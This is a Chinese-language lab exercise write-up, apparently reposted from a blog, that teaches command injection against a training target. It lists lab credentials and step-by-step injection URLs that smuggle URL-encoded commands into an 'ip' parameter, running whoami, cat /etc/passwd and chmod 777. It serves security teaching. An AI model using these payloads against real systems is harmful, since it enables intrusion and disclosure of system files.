命令执行漏洞靶场练习一

实验目的

了解命令执行漏洞的危害

实验原理

由于开发人员编写源码,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句提交,并交由服务器端执行。命令注入攻击中WEB服务器没有过滤类似system(),eval(),exec()等函数是该漏洞攻击成功的最主要原因。

实验内容

命令注入攻击中WEB服务器没有过滤类似system(),eval(),exec()等函数使得攻击成功

实验环境描述

1、靶机 用户名密码为:root toor

2、渗透机 用户名密码为:admin 123456

实验步骤

1、在靶机上输入ifconfig查看靶机地址(请自行修改ip地址,确保实验可以做通)

图片描述

2、在攻击机win7的浏览器中输入靶机地址192.168.10.117/index.php

图片描述

3、找到 Commands injection ,点击Example1进入命令注入环境第一的实例

图片描述

4、在攻击机浏览器中输入http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 && pwd发现并没有什么变化

图片描述

5、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 pwd将&&进行编码,显示了当前路径

图片描述

漏洞利用

1、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 whoami进行whoami查询

图片描述

2、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 net start,通过命令注入攻击查看web服务器开启了哪些服务

图片描述

3、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 cat /etc/passwd,显示当前有哪些用户。

图片描述

4、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 ls -l查看当前目录下所有可见文件的详细属性

图片描述

5、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 chmod 777 examplel.php ,修改examplel.php文件的权限为文件所在的组和其他用户是可读可写可执行。

图片描述

6、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 ls -l查看当前目录下所有可见文件的详细属性,examplel.php的文件权限已经被修改了。

图片描述

原文地址:https://www.cnblogs.com/lzkalislw/p/13627494.html